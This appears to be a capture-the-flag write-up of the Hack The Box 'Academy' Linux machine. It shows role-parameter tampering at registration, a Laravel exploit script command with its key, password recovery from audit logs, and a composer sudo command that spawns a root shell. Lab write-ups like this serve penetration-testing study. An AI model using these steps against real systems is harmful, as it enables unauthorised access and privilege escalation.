Summary

Academy is an easy Linux box that can be exploited by registering a user with administrator privileges. After authenticating as an admin, a new sub-domain is discovered. This shows a vulnerability in the Laravel framework that was used to gain an initial foothold. After finding sensitive information in environment variables and log files, it is possible to switch to a higher privileged user. This user was allowed to run composer as root which has a GTFOBins entry which could be used to spawn a root shell.
This is a manual walkthrough without the use of Metaploit


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.10.10.215

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy

The first thing I checked was the webserver. The user is presented with the following page:

your image

By brute-forcing this page you will find a login and register page. You will also find an admin login page. First, register a user. A new user was registered and the request was intercepted:

POST /register.php HTTP/1.1
Host: academy.htb
Origin: http://academy.htb
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=f6iik1a1kgi019sd8489kp4smk
[...]

uid=jeroen&password=password123%21&confirm=password123%21&roleid=0

You will see a suspicious parameter in this request: roleid. This value was modified to 1 and the request went through. By changing the roleid you have now registered an admin user. So, login to the admin section at: /admin.php.

Subdomain Discovery

As illustrated, a new sub-domain was discovered. This section also shows a lot of sensitive information. It shows a laravel token which can also be intercepted with Burp. This is a Base64 encoded value. Searchsploit was used to look for vulnerabilities within the Laravel Framework:


Exploitation

Since this is a prep for OSCP, I did not use the metasploit module but looked for an exploit script on github. This script was used. The following command was executed to spawn an interactive shell:

pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -i

To upgrade this interactive shell to a reverse shell, a php command was used that was obtained from Payloads All The Things. A reverse shell was obtained as the www-data user.


Privilege Escalation

Several enumeration scripts were used, I found linpeas to be the most useful. Linpeas found the following plaintext password inside an environment variable file:

The home folder was checked to look for users on the system. The following users were identified:

www-data@academy:/home$ ls -la /home
21y4d  ch4p  cry0l1t3  egre55  g0blin  mrb3n

All these were tried and luckily the password was valid for the cry0l1t3 user. This gives you the user.txt.

After this, linpeas was run again as the new user. It flagged the following:


I didn’t like this part so much and was stuck here for a while, apparantly one of the files containes a Hex value which is the encoded password for one of the users. I relied on a hint but it can be found with: cry0l1t3@academy:/var/log$ grep -rnw '/var/log/' -e 'comm="su"' You will obtain the following: /var/log/audit/audit.log.3:32:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A This hex value translates to: mrb3n_Ac@d3my! which can be used to authenticate with the mrb3n user. It was checked what commands this user can run as sudo:

mrb3n@academy:~$ sudo -l
[sudo] password for mrb3n: 

Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

It showed that composer can be run as root. This has an entry in GTFOBins which can be used to obtain a root shell by executing the following commands:

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

This gives you a root shell.


Conclusion

This was a pretty cool box, especially with the nice interface for the web application. Obtaining the initial foothold was relatively straightforward but useful. Obtaining higher privileged accounts was more difficult as the credentials were quite difficult to find. The final escalation to root was easy with the GTFOBins entry for composer. Hope you enjoyed this writeup!